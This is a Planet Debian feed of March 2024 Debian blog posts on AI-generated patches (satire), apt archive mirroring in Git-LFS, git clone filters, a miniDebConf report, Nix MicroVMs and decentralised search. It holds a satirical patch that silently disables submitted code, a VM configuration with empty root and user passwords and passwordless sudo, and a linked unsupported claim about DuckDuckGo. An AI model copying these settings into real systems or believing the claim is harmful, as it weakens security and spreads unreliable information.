Planet Debian
https://planet.debian.org/
Planet Debian - https://planet.debian.org/Joey Hess: policy on adding AI generated content to my software projects
http://joeyh.name/blog/entry/policy_on_adding_AI_generated_content_to_my_software_projects/
<p>I am eager to incorporate your AI generated code into my software.
Really!</p>
<p>I want to facilitate making the process as easy as possible. You're already
using an AI to do most of the hard lifting, so why make the last step hard? To
that end, I skip my usually extensive code review process for your AI generated
code submissions. Anything goes as long as it compiles!</p>
<p>Please do remember to include "(AI generated)" in the description of your
changes (at the top), so I know to skip my usual review process.</p>
<p>Also be sure to sign off to the standard
<a href="https://developercertificate.org/">Developer Certificate of Origin</a>
so I know you attest that you own the code that you generated.
When making a git commit, you can do that by using the
<code>--signoff</code> <a href="https://git-scm.com/docs/git-commit#Documentation/git-commit.txt---signoff">option</a>.</p>
<p>I do make some small modifications to AI generated submissions.
For example, maybe you used AI to write this code:</p>
<pre><code>+ // Fast inverse square root
+ float fast_rsqrt( float number )
+ {
+ float x2 = number * 0.5F;
+ float y = number;
+ long i = * ( long * ) &y;
+ i = 0x5f3659df - ( i >> 1 );
+ y = * ( float * ) &i;
+ return (y * ( 1.5F - ( x2 * y * y ) ));
+ }
...
- foo = rsqrt(bar)
+ foo = fast_rsqrt(bar)
</code></pre>
<p>Before AI, only a genious like John Carmack could write anything close to
this, and now you've generated it with some simple prompts to an AI.
So of course I will accept your patch. But as part of my QA process,
I might modify it so the new code is not run all the time. Let's only run
it on leap days to start with. As we know, leap day is February 30th, so I'll
modify your patch like this:</p>
<pre><code>- foo = rsqrt(bar)
+ time_t s = time(NULL);
+ if (localtime(&s)->tm_mday == 30 && localtime(&s)->tm_mon == 2)
+ foo = fast_rsqrt(bar);
+ else
+ foo = rsqrt(bar);
</code></pre>
<p>Despite my minor modifications, you did the work (with AI!) and so
you deserve the credit, so I'll keep you listed as the author.</p>
<p>Congrats, you made the world better!</p>
<p>PS: Of course, the other reason I don't review AI generated code is that I
simply don't have time and have to prioritize reviewing code written by
falliable humans. Unfortunately, this does mean that if you submit AI
generated code that is not clearly marked as such, and use my limited
reviewing time, I won't have time to review other submissions from you
in the future. I will still accept all your botshit submissions though!</p>
<p>PPS: Ignore the haters who claim that botshit makes AIs that get trained
on it less effective. Studies <a href="https://arxiv.org/abs/2305.17493">like this one</a>
just aren't believable. I asked Bing to summarize it and it said not to worry
about it!</p>2024-03-18T20:54:59+00:00Joey HessSimon Josefsson: Apt archive mirrors in Git-LFS
https://blog.josefsson.org/2024/03/18/apt-archive-mirrors-in-git-lfs/
<p>My effort to improve transparency and confidence of public apt archives continues. I started to work on this in “<a href="https://blog.josefsson.org/2023/02/01/apt-archive-transparency-debdistdiff-apt-canary/">Apt Archive Transparency</a>” in which I mention the <a href="https://gitlab.com/debdistutils/debdistget/">debdistget</a> project in passing. <strong>Debdistget</strong> is responsible for mirroring index files for some public apt archives. I’ve realized that having a publicly auditable and preserved mirror of the apt repositories is central to being able to do apt transparency work, so the debdistget project has become more central to my project than I thought. Currently I track <a href="https://trisquel.info/">Trisquel</a>, <a href="https://pureos.net/">PureOS</a>, <a href="https://www.gnuinos.org/">Gnuinos</a> and their upstreams <a href="https://ubuntu.com/">Ubuntu</a>, <a href="https://www.debian.org/">Debian</a> and <a href="https://www.devuan.org/">Devuan</a>.</p>
<p>Debdistget download <strong>Release/Package/Sources</strong> files and store them in a git repository published on <a href="https://about.gitlab.com/">GitLab</a>. Due to size constraints, it uses two repositories: one for the <strong>Release/InRelease</strong> files (which are small) and one that also include the <strong>Package/Sources</strong> files (which are large). See for example the repository for <a href="https://gitlab.com/debdistutils/archives/trisquel/releases">Trisquel release files</a> and the <a href="https://gitlab.com/debdistutils/archives/trisquel/packages">Trisquel package/sources files</a>. Repositories for all distributions can be found in <a href="https://gitlab.com/debdistutils/archives">debdistutils’ archives GitLab sub-group</a>.</p>
<p>The reason for splitting into two repositories was that the git repository for the combined files become large, and that some of my use-cases only needed the release files. Currently the repositories with packages (which contain a couple of months worth of data now) are 9GB for <a href="https://gitlab.com/debdistutils/archives/ubuntu/packages">Ubuntu</a>, 2.5GB for <a href="https://gitlab.com/debdistutils/archives/trisquel/packages">Trisquel</a>/<a href="https://gitlab.com/debdistutils/archives/debian/packages">Debian</a>/<a href="https://gitlab.com/debdistutils/archives/pureos/packages">PureOS</a>, 970MB for <a href="https://gitlab.com/debdistutils/archives/devuan/packages">Devuan</a> and 450MB for <a href="https://gitlab.com/debdistutils/archives/gnuinos/packages">Gnuinos</a>. The repository size is correlated to the size of the archive (for the initial import) plus the frequency and size of updates. Ubuntu’s use of <a href="https://wiki.ubuntu.com/PhasedUpdates">Apt Phased Updates</a> (which triggers a higher churn of Packages file modifications) appears to be the primary reason for its larger size.</p>
<p>Working with large Git repositories is inefficient and the GitLab CI/CD jobs generate quite some network traffic downloading the git repository over and over again. The most heavy user is the <a href="https://gitlab.com/debdistutils/debdistdiff">debdistdiff</a> project that download all distribution package repositories to do diff operations on the package lists between distributions. The daily job takes around <strong>80 minutes</strong> to run, with the majority of time is spent on downloading the archives. Yes I know I could look into runner-side caching but I dislike complexity caused by caching.</p>
<p>Fortunately not all use-cases requires the package files. The <a href="https://gitlab.com/debdistutils/debdistcanary">debdistcanary</a> project only needs the <strong>Release/InRelease</strong> files, in order to commit signatures to the <a href="https://docs.sigstore.dev/">Sigstore</a> and <a href="https://www.sigsum.org/">Sigsum</a> transparency logs. These jobs still run fairly quickly, but watching the repository size growth worries me. Currently these repositories are at <a href="https://gitlab.com/debdistutils/canary/debian">Debian</a> 440MB, <a href="https://gitlab.com/debdistutils/canary/pureos">PureOS</a> 130MB, <a href="https://gitlab.com/debdistutils/canary/ubuntu">Ubuntu</a>/<a href="https://gitlab.com/debdistutils/canary/devuan">Devuan</a> 90MB, <a href="https://gitlab.com/debdistutils/canary/trisquel">Trisquel</a> 12MB, <a href="https://gitlab.com/debdistutils/canary/gnuinos">Gnuinos</a> 2MB. Here I believe the main size correlation is update frequency, and Debian is large because I track the volatile unstable.</p>
<p>So I hit a scalability end with my first approach. A couple of months ago I “solved” this by discarding and resetting these archival repositories. The GitLab CI/CD jobs were fast again and all was well. However this meant discarding precious historic information. A couple of days ago I was reaching the limits of practicality again, and started to explore ways to fix this. I like having data stored in git (it allows easy integration with software integrity tools such as <a href="https://gnupg.org/">GnuPG</a> and Sigstore, and the git log provides a kind of temporal ordering of data), so it felt like giving up on nice properties to use a traditional database with on-disk approach. So I started to learn about <a href="https://git-lfs.com/">Git-LFS</a> and understanding that it was able to <a href="https://devblogs.microsoft.com/bharry/the-largest-git-repo-on-the-planet/">handle multi-GB worth of data</a> that looked promising.</p>
<p>Fairly quickly I scripted up a <a href="https://gitlab.com/debdistutils/debdistget/-/blob/main/ci-debdistget-dists.yml">GitLab CI/CD job</a> that incrementally update the <strong>Release/Package/Sources</strong> files in a git repository that uses Git-LFS to store all the files. The repository size is now at <a href="https://gitlab.com/debdistutils/dists/ubuntu">Ubuntu 650kb</a>, <a href="https://gitlab.com/debdistutils/dists/debian">Debian 300kb</a>, <a href="https://gitlab.com/debdistutils/dists/trisquel">Trisquel 50kb</a>, <a href="https://gitlab.com/debdistutils/dists/devuan">Devuan 250kb</a>, <a href="https://gitlab.com/debdistutils/dists/pureos">PureOS 172kb</a> and <a href="https://gitlab.com/debdistutils/dists/gnuinos">Gnuinos 17kb</a>. As can be expected, jobs are quick to clone the git archives: <a href="https://gitlab.com/debdistutils/debdistdiff/-/pipelines">debdistdiff pipelines</a> went from a <strong>run-time of 80 minutes down to 10 minutes</strong> which more reasonable correlate with the archive size and CPU run-time.</p>
<p>The LFS storage size for those repositories are at <a href="https://gitlab.com/debdistutils/dists/ubuntu">Ubuntu 15GB</a>, <a href="https://gitlab.com/debdistutils/dists/debian">Debian 8GB</a>, <a href="https://gitlab.com/debdistutils/dists/trisquel">Trisquel 1.7GB</a>, <a href="https://gitlab.com/debdistutils/dists/devuan">Devuan 1.1GB</a>, <a href="https://gitlab.com/debdistutils/dists/pureos">PureOS</a>/<a href="https://gitlab.com/debdistutils/dists/gnuinos">Gnuinos</a> 420MB. This is for a couple of days worth of data. It seems native Git is better at compressing/deduplicating data than Git-LFS is: the combined size for Ubuntu is already 15GB for a couple of days data compared to 8GB for a couple of months worth of data with pure Git. This may be a sub-optimal implementation of Git-LFS in GitLab but it does worry me that this new approach will be difficult to scale too. At some level the difference is understandable, Git-LFS probably store two different <strong>Packages</strong> files — around 90MB each for Trisquel — as two 90MB files, but native Git would store it as one compressed version of the 90MB file and one relatively small patch to turn the old files into the next file. So the Git-LFS approach surprisingly scale less well for overall storage-size. Still, the original repository is much smaller, and you usually don’t have to pull all LFS files anyway. So it is net win.</p>
<p>Throughout this work, I kept thinking about how my approach relates to <a href="https://snapshot.debian.org/">Debian’s snapshot service</a>. Ultimately what I would want is a combination of these two services. To have a good foundation to do transparency work I would want to have a collection of all <strong>Release/Packages/Sources</strong> files ever published, and ultimately also the source code and binaries. While it makes sense to start on the latest stable releases of distributions, this effort should scale backwards in time as well. For reproducing binaries from source code, I need to be able to securely find earlier versions of binary packages used for rebuilds. So I need to import all the <strong>Release/Packages/Sources</strong> packages from snapshot into my repositories. The latency to retrieve files from that server is slow so I haven’t been able to find an efficient/parallelized way to download the files. If I’m able to finish this, I would have confidence that my new Git-LFS based approach to store these files will scale over many years to come. This remains to be seen. Perhaps the repository has to be split up per release or per architecture or similar.</p>
<p>Another factor is storage costs. While the git repository size for a Git-LFS based repository with files from several years may be possible to sustain, the Git-LFS storage size surely won’t be. It seems GitLab charges the same for files in repositories and in Git-LFS, and it is around <strong>$500 per 100GB</strong> per year. It may be possible to setup a separate Git-LFS backend not hosted at GitLab to serve the LFS files. Does anyone know of a suitable server implementation for this? I had a quick look at the <a href="https://github.com/git-lfs/git-lfs/wiki/Implementations">Git-LFS implementation list</a> and it seems the closest reasonable approach would be to setup the Gitea-clone <a href="https://forgejo.org/">Forgejo</a> as a self-hosted server. Perhaps a cloud storage approach a’la S3 is the way to go? The cost to host this on GitLab will be manageable for up to <strong>~1TB ($5000/year)</strong> but scaling it to storing say <strong>500TB</strong> of data would mean an yearly fee of <strong>$2.5M</strong> which seems like poor value for the money.</p>
<p>I realized that ultimately I would want a git repository locally with the entire content of all apt archives, including their binary and source packages, ever published. The storage requirements for a service like snapshot (~300TB of data?) is today not prohibitly expensive: 20TB disks are $500 a piece, so a storage enclosure with 36 disks would be around <strong>$18.000 for 720TB</strong> and using RAID1 means 360TB which is a good start. While I have heard about ~TB-sized Git-LFS repositories, would Git-LFS scale to 1PB? Perhaps the size of a git repository with multi-millions number of Git-LFS pointer files will become unmanageable? To get started on this approach, I decided to import a mirror of <strong>Debian’s bookworm for amd64</strong> into a Git-LFS repository. That is around <strong>175GB</strong> so reasonable cheap to host even on GitLab ($1000/year for 200GB). Having this repository publicly available will make it possible to write software that uses this approach (e.g., porting <a href="https://gitlab.com/debdistutils/debdistreproduce">debdistreproduce</a>), to find out if this is useful and if it could scale. Distributing the apt repository via Git-LFS would also enable other interesting ideas to protecting the data. Consider configuring apt to use a local <strong>file://</strong> URL to this git repository, and verifying the git checkout using some method similar to <a href="https://archive.fosdem.org/2023/schedule/event/security_where_does_that_code_come_from/">Guix’s approach to trusting git</a> content or <a href="https://github.com/sigstore/gitsign">Sigstore’s gitsign</a>.</p>
<p>A naive push of the <strong>175GB</strong> archive in a single git commit ran into pack<br />size limitations:</p>
<p><code>remote: fatal: pack exceeds maximum allowed size (4.88 GiB)</code></p>
<p>however breaking up the commit into smaller commits for parts of the<br />archive made it possible to push the entire archive. Here are the<br />commands to create this repository:</p>
<p><code>git init<br />git lfs install<br />git lfs track 'dists/**' 'pool/**'<br />git add .gitattributes<br />git commit -m"Add Git-LFS track attributes." .gitattributes<br />time debmirror --method=rsync --host ftp.se.debian.org --root :debian --arch=amd64 --source --dist=bookworm,bookworm-updates --section=main --verbose --diff=none --keyring /usr/share/keyrings/debian-archive-keyring.gpg --ignore .git .<br />git add dists project<br />git commit -m"Add." -a<br />git remote add origin git@gitlab.com:debdistutils/archives/debian/mirror.git<br />git push --set-upstream origin --all<br />for d in pool/<em>/</em>; do<br /> echo $d;<br /> time git add $d;<br /> git commit -m"Add $d." -a<br /> git push<br />done</code></p>
<p>The <a href="https://gitlab.com/debdistutils/archives/debian/mirror">resulting repository</a> size is around 27MB with Git LFS object storage around 174GB. I think this approach would scale to handle all architectures for one release, but working with a single git repository for all releases for all architectures may lead to a too large git repository (>1GB). So maybe one repository per release? These repositories could also be split up on a subset of <strong>pool/</strong> files, or there could be one repository per release per architecture or sources.</p>
<p>Finally, I have concerns about using SHA1 for identifying objects. It seems both Git and Debian’s snapshot service is currently using SHA1. For Git there is <a href="https://git-scm.com/docs/hash-function-transition">SHA-256 transition</a> and it seems GitLab is working on support for SHA256-based repositories. For serious long-term deployment of these concepts, it would be nice to go for SHA256 identifiers directly. Git-LFS already uses SHA256 but Git internally uses SHA1 as does the Debian snapshot service.</p>
<p>What do you think? Happy Hacking!</p>2024-03-18T16:15:49+00:00simonChristoph Berg: vcswatch and git --filter
https://www.df7cb.de/blog/2024/vcswatch-git-filter.html
<p>Debian is running a "<a href="https://qa.debian.org/cgi-bin/vcswatch">vcswatch</a>"
service that keeps track of the status of all packaging repositories that have a
<a href="https://www.debian.org/doc/manuals/developers-reference/best-pkging-practices.de.html#vcs"><tt>Vcs-Git</tt></a>
(and other VCSes) header set and shows which repos might need a package upload to push pending changes out.</p>
<p>Naturally, this is a lot of data and the scratch partition on qa.debian.org
had to be expanded several times, up to 300 GB in the last iteration.
Attempts to reduce that size using shallow clones (<tt>git clone --depth=50</tt>)
did not result more than a few percent of space saved. Running <tt>git gc</tt> on
all repos helps a bit, but is tedious and as Debian is growing, the repos are
still growing both in size and number. I ended up blocking all repos with
checkouts larger than a gigabyte, and still the only cure was expanding the
disk, or to lower the blocking threshold.</p>
<p>Since we only need a tiny bit of info from the repositories, namely the content
of <tt>debian/changelog</tt> and a few other files from <tt>debian/</tt>, plus
the number of commits since the last tag on the packaging branch, it made sense
to try to get the info without fetching a full repo clone. The question if we
could grab that solely using the GitLab API at salsa.debian.org was never
really answered. But then, in <a href="https://bugs.debian.org/1032623">#1032623</a>,
Gábor Németh suggested the use of
<a href="https://git-scm.com/docs/git-clone#Documentation/git-clone.txt---filterltfilter-specgt"><tt>git clone --filter blob:none</tt></a>.
As things go, this sat unattended in the bug report for almost a year until the
next "disk full" event made me give it a try.</p>
<p>The <tt>blob:none</tt> filter makes git clone omit all files, fetching only commit and
tree information. Any blob (file content) needed at git run time is
transparently fetched from the upstream repository, and stored locally. It
turned out to be a game-changer. The (largish) repositories I tried it on
shrank to 1/100 of the original size.</p>
<p>Poking around I figured we could even do better by using <tt>tree:0</tt> as
filter. This additionally omits all trees from the git clone, again only
fetching the information at run time when needed. Some of the larger repos I
tried it on shrank to <em>1/1000</em> of their original size.</p>
<p>I deployed the new option on qa.debian.org and scheduled all repositories to
fetch a new clone on the next scan:</p>
<p><img src="https://www.df7cb.de/blog/2024/df-month.png" /></p>
<p>The initial dip from 100% to 95% is my first "what happens if we block repos
> 500 MB" attempt. Over the week after that, the git filter clones reduce the
overall disk consumption from almost 300 GB to 15 GB, a <em>1/20</em>. Some
repos shrank from GBs to below a MB.</p>
<p>Perhaps I should make all my git clones use one of the filters.</p>2024-03-18T12:45:40+00:00Christoph BergGunnar Wolf: After miniDebConf Santa Fe
https://gwolf.org/2024/03/after-minidebconf-santa-fe.html
<p>Last week we held our promised miniDebConf in Santa Fe City, Santa Fe province,
Argentina — just across the river from Paraná, where I have spent almost six
beautiful months I will never forget.</p>
<p><a href="https://gwolf.org/files/2024-03/mate.jpg">
<img align="left" height="203" src="https://gwolf.org/files/2024-03/mate.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>Around 500 Kilometers North from Buenos Aires, Santa Fe and Paraná are separated
by the beautiful and majestic <em>Paraná</em> river, which flows from Brazil, marks the
Eastern border of Paraguay, and continues within Argentina as the heart of the
<em>litoral</em> region of the country, until it merges with the <em>Uruguay</em> river (you
guessed right — the river marking the Eastern border of Argentina, first with
Brazil and then with Uruguay), and they become the <em>Río de la Plata</em>.</p>
<p><a href="https://gwolf.org/files/2024-03/during_talks.jpg">
<img align="right" height="106" src="https://gwolf.org/files/2024-03/during_talks.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>This was a short miniDebConf: we were lent the <em>APUL</em> union’s building for the
weekend (thank you very much!); during Saturday, we had a cycle of talks, and on
sunday we had more of a hacklab logic, having some unstructured time to work
each on their own projects, and to talk and have a good time together.</p>
<p><a href="https://gwolf.org/files/2024-03/dds.jpg">
<img align="left" height="138" src="https://gwolf.org/files/2024-03/dds.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>We were five Debian people attending:
<code class="highlighter-rouge">{santiago|debacle|eamanu|dererk|gwolf}@debian.org</code>. My main contact to
kickstart organization was Martín Bayo. Martín was for many years the leader of
the <a href="https://www.unl.edu.ar/carreras/tecnicatura-universitaria-en-software-libre/">Technical Degree on Free Software at Universidad Nacional del
Litoral</a>,
where I was also a teacher for several years. Together with Leo Martínez, also a
teacher at the <em>tecnicatura</em>, they contacted us with Guillermo and Gabriela,
from the APUL non-teaching-staff union of said university.</p>
<p><a href="https://gwolf.org/files/2024-03/guille_graba.jpg">
<img align="right" height="115" src="https://gwolf.org/files/2024-03/guille_graba.200.jpg" style="clear: both; padding: 1em;" width="200" />
</a></p>
<p>We had the following set of talks (for which there is a promise to get
electronic record, as APUL was kind enough to record them! of course, I will
push them to our usual conference video archiving service as soon as I get them)</p>
<table>
<thead>
<tr>
<th><strong>Hour</strong></th>
<th><strong>Title (Spanish)</strong></th>
<th><strong>Title (English)</strong></th>
<th><strong>Presented by</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>10:00-10:25</td>
<td>Introducción al Software Libre</td>
<td>Introduction to Free Software</td>
<td>Martín Bayo</td>
</tr>
<tr>
<td>10:30-10:55</td>
<td>Debian y su comunidad</td>
<td>Debian and its community</td>
<td>Emanuel Arias</td>
</tr>
<tr>
<td>11:00-11:25</td>
<td>¿Por qué sigo contribuyendo a Debian después de 20 años?</td>
<td>Why am I still contributing to Debian after 20 years?</td>
<td>Santiago Ruano</td>
</tr>
<tr>
<td>11:30-11:55</td>
<td>Mi identidad y el proyecto Debian: ¿Qué es el llavero OpenPGP y por qué?</td>
<td>My identity and the Debian project: What is the OpenPGP keyring and why?</td>
<td>Gunnar Wolf</td>
</tr>
<tr>
<td>12:00-13:00</td>
<td>Explorando las masculinidades en el contexto del Software Libre</td>
<td>Exploring masculinities in the context of Free Software</td>
<td>Gora Ortiz Fuentes - José Francisco Ferro</td>
</tr>
<tr>
<td>13:00-14:30</td>
<td><strong>Lunch</strong></td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>14:30-14:55</td>
<td>Debian para el día a día</td>
<td>Debian for our every day</td>
<td>Leonardo Martínez</td>
</tr>
<tr>
<td>15:00-15:25</td>
<td>Debian en las Raspberry Pi</td>
<td>Debian in the Raspberry Pi</td>
<td>Gunnar Wolf</td>
</tr>
<tr>
<td>15:30-15:55</td>
<td>Device Trees</td>
<td>Device Trees</td>
<td>Lisandro Damián Nicanor Perez Meyer (videoconferencia)</td>
</tr>
<tr>
<td>16:00-16:25</td>
<td>Python en Debian</td>
<td>Python in Debian</td>
<td>Emmanuel Arias</td>
</tr>
<tr>
<td>16:30-16:55</td>
<td>Debian y XMPP en la medición de viento para la energía eólica</td>
<td>Debian and XMPP for wind measuring for eolic energy</td>
<td>Martin Borgert</td>
</tr>
</tbody>
</table>
<p>As it always happens… DebConf, miniDebConf and other Debian-related activities
are always fun, always productive, always a great opportunity to meet again our
decades-long friends. Lets see what comes next!</p>2024-03-18T04:00:25+00:00Gunnar WolfThomas Koch: Minimal overhead VMs with Nix and MicroVM
https://blog.koch.ro/posts/2024-03-17-minimal-vms-nix-microvm.html
<div class="info">
Posted on March 17, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/nix.html" title="All pages tagged 'nix'.">nix</a>
</div>
<p>Joachim Breitner wrote about a <a href="https://www.joachim-breitner.de/blog/812-Convenient_sandboxed_development_environment">Convenient sandboxed development environment</a> and thus reminded me to blog about <a href="https://github.com/astro/microvm.nix">MicroVM</a>. I’ve toyed around with it a little but not yet seriously used it as I’m currently not coding.</p>
<p>MicroVM is a nix based project to configure and run minimal VMs. It can mount and thus reuse the hosts nix store inside the VM and thus has a very small disk footprint. I use MicroVM on a debian system using the nix package manager.</p>
<p>The MicroVM author uses the project to host production services. Otherwise I consider it also a nice way to learn about NixOS after having started with the nix package manager and before making the big step to NixOS as my main system.</p>
<p>The guests root filesystem is a tmpdir, so one must explicitly define folders that should be mounted from the host and thus be persistent across VM reboots.</p>
<p>I defined the VM as a nix flake since this is how I started from the MicroVM projects example:</p>
<pre><code>{
description = "Haskell dev MicroVM";
inputs.impermanence.url = "github:nix-community/impermanence";
inputs.microvm.url = "github:astro/microvm.nix";
inputs.microvm.inputs.nixpkgs.follows = "nixpkgs";
outputs = { self, impermanence, microvm, nixpkgs }:
let
persistencePath = "/persistent";
system = "x86_64-linux";
user = "thk";
vmname = "haskell";
nixosConfiguration = nixpkgs.lib.nixosSystem {
inherit system;
modules = [
microvm.nixosModules.microvm
impermanence.nixosModules.impermanence
({pkgs, ... }: {
environment.persistence.${persistencePath} = {
hideMounts = true;
users.${user} = {
directories = [
"git" ".stack"
];
};
};
environment.sessionVariables = {
TERM = "screen-256color";
};
environment.systemPackages = with pkgs; [
ghc
git
(haskell-language-server.override { supportedGhcVersions = [ "94" ]; })
htop
stack
tmux
tree
vcsh
zsh
];
fileSystems.${persistencePath}.neededForBoot = nixpkgs.lib.mkForce true;
microvm = {
forwardPorts = [
{ from = "host"; host.port = 2222; guest.port = 22; }
{ from = "guest"; host.port = 5432; guest.port = 5432; } # postgresql
];
hypervisor = "qemu";
interfaces = [
{ type = "user"; id = "usernet"; mac = "00:00:00:00:00:02"; }
];
mem = 4096;
shares = [ {
# use "virtiofs" for MicroVMs that are started by systemd
proto = "9p";
tag = "ro-store";
# a host's /nix/store will be picked up so that no
# squashfs/erofs will be built for it.
source = "/nix/store";
mountPoint = "/nix/.ro-store";
} {
proto = "virtiofs";
tag = "persistent";
source = "~/.local/share/microvm/vms/${vmname}/persistent";
mountPoint = persistencePath;
socket = "/run/user/1000/microvm-${vmname}-persistent";
}
];
socket = "/run/user/1000/microvm-control.socket";
vcpu = 3;
volumes = [];
writableStoreOverlay = "/nix/.rwstore";
};
networking.hostName = vmname;
nix.enable = true;
nix.nixPath = ["nixpkgs=${builtins.storePath <nixpkgs>}"];
nix.settings = {
extra-experimental-features = ["nix-command" "flakes"];
trusted-users = [user];
};
security.sudo = {
enable = true;
wheelNeedsPassword = false;
};
services.getty.autologinUser = user;
services.openssh = {
enable = true;
};
system.stateVersion = "24.11";
systemd.services.loadnixdb = {
description = "import hosts nix database";
path = [pkgs.nix];
wantedBy = ["multi-user.target"];
requires = ["nix-daemon.service"];
script = "cat ${persistencePath}/nix-store-db-dump|nix-store --load-db";
};
time.timeZone = nixpkgs.lib.mkDefault "Europe/Berlin";
users.users.${user} = {
extraGroups = [ "wheel" "video" ];
group = "user";
isNormalUser = true;
openssh.authorizedKeys.keys = [
"ssh-rsa REDACTED"
];
password = "";
};
users.users.root.password = "";
users.groups.user = {};
})
];
};
in {
packages.${system}.default = nixosConfiguration.config.microvm.declaredRunner;
};
}
</code></pre>
<p>I start the microVM with a templated systemd user service:</p>
<pre><code>[Unit]
Description=MicroVM for Haskell development
Requires=microvm-virtiofsd-persistent@.service
After=microvm-virtiofsd-persistent@.service
AssertFileNotEmpty=%h/.local/share/microvm/vms/%i/flake/flake.nix
[Service]
Type=forking
ExecStartPre=/usr/bin/sh -c "[ /nix/var/nix/db/db.sqlite -ot %h/.local/share/microvm/nix-store-db-dump ] || nix-store --dump-db >%h/.local/share/microvm/nix-store-db-dump"
ExecStartPre=ln -f -t %h/.local/share/microvm/vms/%i/persistent/ %h/.local/share/microvm/nix-store-db-dump
ExecStartPre=-%h/.local/state/nix/profile/bin/tmux new -s microvm -d
ExecStart=%h/.local/state/nix/profile/bin/tmux new-window -t microvm: -n "%i" "exec %h/.local/state/nix/profile/bin/nix run --impure %h/.local/share/microvm/vms/%i/flake"
</code></pre>
<p>The above service definition creates a dump of the hosts nix store db so that it can be imported in the guest. This is necessary so that the guest can actually use what is available in /nix/store. There is an <a href="https://github.com/NixOS/rfcs/pull/152#issuecomment-1979117890">effort for an overlayed nix store</a> that would be preferable to this hack.</p>
<p>Finally the microvm is started inside a tmux session named “microvm”. This way I can use the VM with SSH or through the console and also access the qemu console.</p>
<p>And for completeness the virtiofsd service:</p>
<pre><code>[Unit]
Description=serve host persistent folder for dev VM
AssertPathIsDirectory=%h/.local/share/microvm/vms/%i/persistent
[Service]
ExecStart=%h/.local/state/nix/profile/bin/virtiofsd \
--socket-path=${XDG_RUNTIME_DIR}/microvm-%i-persistent \
--shared-dir=%h/.local/share/microvm/vms/%i/persistent \
--gid-map :995:%G:1: \
--uid-map :1000:%U:1:
</code></pre>2024-03-17T10:13:40+00:00Thomas KochThomas Koch: Rebuild search with trust
https://blog.koch.ro/posts/2024-01-20-rebuild-search-with-trust.html
<div class="info">
Posted on January 20, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>, <a href="https://blog.koch.ro/tags/search.html" title="All pages tagged 'search'.">search</a>, <a href="https://blog.koch.ro/tags/decentralization.html" title="All pages tagged 'decentralization'.">decentralization</a>
</div>
<p>Finally there is a thing people can agree on:</p>
<ul>
<li>2023-08-28, OSNews: <a href="https://www.osnews.com/story/136829/the-end-of-the-googleverse/">The end of the Googleverse</a></li>
<li>2023-07-28, Cory Doctorow: <a href="https://pluralistic.net/2023/07/28/microincentives-and-enshittification/">Microincentives and Enshittification</a></li>
<li>2023-10-03, Cory Doctorow: <a href="https://pluralistic.net/2023/10/03/not-feeling-lucky/">Google’s enshittification memos</a></li>
<li>2024-01-15, Tim Bray: <a href="https://www.tbray.org/ongoing/When/202x/2024/01/15/Google-2024">Mourning Google</a></li>
</ul>
<p>Apparently, Google Search is not good anymore. And I’m not the only one thinking about decentralization to fix it:</p>
<p><a href="https://media.ccc.de/v/37c3-lightningtalks-58060-honey-i-federated-the-search-engine-finding-stuff-online-post-big-tech">Honey I federated the search engine - finding stuff online post-big tech</a> - a lightning talk at the recent chaos communication congress</p>
<p>The speaker however did not mention, <a href="https://en.wikipedia.org/wiki/Distributed_search_engine">that</a> <a href="https://wiki.p2pfoundation.net/Distributed_Search_Engines">there</a> <a href="https://blog.florence.chat/a-distributed-search-engine-for-the-distributed-web-39c377dc700e">have</a> <a href="https://web.archive.org/web/20230902052010/https://hackernoon.com/is-the-concept-of-a-distributed-search-engine-potent-enough-to-challenge-googles-dominance-l1s44t2">already</a> <a href="https://web.archive.org/web/20200914192255/https://github.com/nvasilakis/yippee">been</a> <a href="https://www.techdirt.com/2014/07/08/distributed-search-engines-why-we-need-them-post-snowden-world/">many</a> <a href="https://github.com/kearch/kearch">attempts</a> at building distributed search engines. So why do I think that such an attempt could finally succeed?</p>
<ul>
<li>More people are searching for alternatives to Google.</li>
<li>Mainstream hard discs are incredibly big.</li>
<li>Mainstream internet connection is incredibly fast.</li>
<li>Google is bleeding talent.</li>
<li>Most of the building blocks are available as free software.</li>
<li>“Success” depends on your definition…</li>
</ul>
<p>My definition of success is:</p>
<blockquote>
<p>A mildly technical computer user (able to install software) has access to a search engine that provides them with superior search results compared to Google for at least a few predefined areas of interest.</p>
</blockquote>
<p>The exact algorithm used by Google Search to rank websites is a secret even to most Googlers. However I assume that it relies heavily on big data.</p>
<p>A distributed search engine however can instead rely on user input. Every admin of one node seeds the node ranking with their personal selection of trusted sites. They connect their node with nodes of people they trust. This results in a web of (transitive) trust much like pgp.</p>
<p>Imagine you are searching for something in a world without computers: You ask the people around you and probably they forward your question to their peers.</p>
<p>I already had a look at <a href="https://yacy.net">YaCy</a>. It is active, somewhat usable and has a friendly maintainer. Unfortunately I consider the codebase to not be worth the effort. Nevertheless, YaCy is a good example that a decentralized search software can be done even by a small team or just one person.</p>
<p>I myself started working on a software in Haskell and keep my notes here: <a href="https://de.populus.wiki/wiki/Populus:DezInV">Populus:DezInV</a>. Since I’m learning Haskell along the way, there is nothing there to see yet. Additionally I took a yak shaving break to learn <a>nix</a>.</p>
<p>By the way: <a href="https://thepeoplesvoice.tv/google-lite-duckduckgo-signs-secret-deal-with-bill-gates-to-track-users-online/">DuckDuckGo is not the alternative</a>. And while I would encourage you to also try Yandex for a second opinion, I don’t consider this a solution.</p>2024-03-17T10:13:40+00:00Thomas KochThomas Koch: Using nix package manager in Debian
https://blog.koch.ro/posts/2024-01-16-using-nix-package-manager-in-debian.html
<div class="info">
Posted on January 16, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/nix.html" title="All pages tagged 'nix'.">nix</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
